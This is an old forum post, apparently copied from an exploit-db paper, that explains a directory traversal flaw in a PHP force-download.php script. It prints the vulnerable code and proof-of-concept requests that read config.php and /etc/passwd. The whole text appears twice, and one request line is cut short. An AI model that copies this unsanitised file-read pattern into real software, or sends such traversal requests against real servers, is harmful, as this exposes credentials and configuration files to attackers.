Directory traversal (Unix) Vulnerability
Posted: Thu May 20, 2010 4:58 pm
-== D E S C R I P T I O N ==-
Directory Traversal is a vulnerability which allows attackers to access restricted directories
and execute commands outside of the web server's root directory. This vulnerability is like Local File
Inclussion and we can found it on Remote File Disclosure tecnique
(affects /force-download.php)
------------------------------------------------------------->>
By exploiting directory traversal vulnerabilities, attackers step out of the root directory and access
files in other directories.As a result, attackers might view restricted files or execute commands,
leading to a full compromise of the Web server.
-== P r o o f O f C o n c e p t ==-
As we knows, Remote File Disclosure has vulnerability on force-download.php
--------------------------------------------
<?php
header("Content-type: application/force-download");
header("Content-disposition: attachment; filename=".$_GET['gabriel']);
echo file_get_contents($_GET['gabriel']);
?>
--------------------------------------------
and be able to >>
Request: http://127.0.0.1/force-download.php?gabriel=[files]
http://127.0.0.1/force-download.php?gabriel=index.php
http://127.0.0.1/force-download.php?gabriel=config.php
--------------------------------------------
<?php $file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['gabriel'];
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Content-Type: application/force-download");
header( "Content-Disposition: attachment; filename=".basename($file));
//header( "Content-Description: File Transfer");
@readfile($file);
exit(0);
?>
--------------------------------------------
Request: http://127.0.0.1/force-download.php?gab ... etc/passwd
--------------------------------------------
w00ps!! we can succesfully read the "etc/passwd" file. See the source code on
$_REQUEST['gabriel']; and @readfile($file); for that's command, we can see
the content of an arbitrary file ^_^ (such as on Local File Inclussion vulnerability).
http://www.exploit-db.com/papers/12589 :circle:
Directory Traversal is a vulnerability which allows attackers to access restricted directories
and execute commands outside of the web server's root directory. This vulnerability is like Local File
Inclussion and we can found it on Remote File Disclosure tecnique
(affects /force-download.php)
------------------------------------------------------------->>
By exploiting directory traversal vulnerabilities, attackers step out of the root directory and access
files in other directories.As a result, attackers might view restricted files or execute commands,
leading to a full compromise of the Web server.
-== P r o o f O f C o n c e p t ==-
As we knows, Remote File Disclosure has vulnerability on force-download.php
--------------------------------------------
<?php
header("Content-type: application/force-download");
header("Content-disposition: attachment; filename=".$_GET['gabriel']);
echo file_get_contents($_GET['gabriel']);
?>
--------------------------------------------
and be able to >>
Request: http://127.0.0.1/force-download.php?gabriel=[files]
http://127.0.0.1/force-download.php?gabriel=index.php
http://127.0.0.1/force-download.php?gabriel=config.php
--------------------------------------------
<?php $file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['gabriel'];
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Content-Type: application/force-download");
header( "Content-Disposition: attachment; filename=".basename($file));
//header( "Content-Description: File Transfer");
@readfile($file);
exit(0);
?>
--------------------------------------------
Request: http://127.0.0.1/force-download.php?gab ... etc/passwd
--------------------------------------------
w00ps!! we can succesfully read the "etc/passwd" file. See the source code on
$_REQUEST['gabriel']; and @readfile($file); for that's command, we can see
the content of an arbitrary file ^_^ (such as on Local File Inclussion vulnerability).
http://www.exploit-db.com/papers/12589 :circle: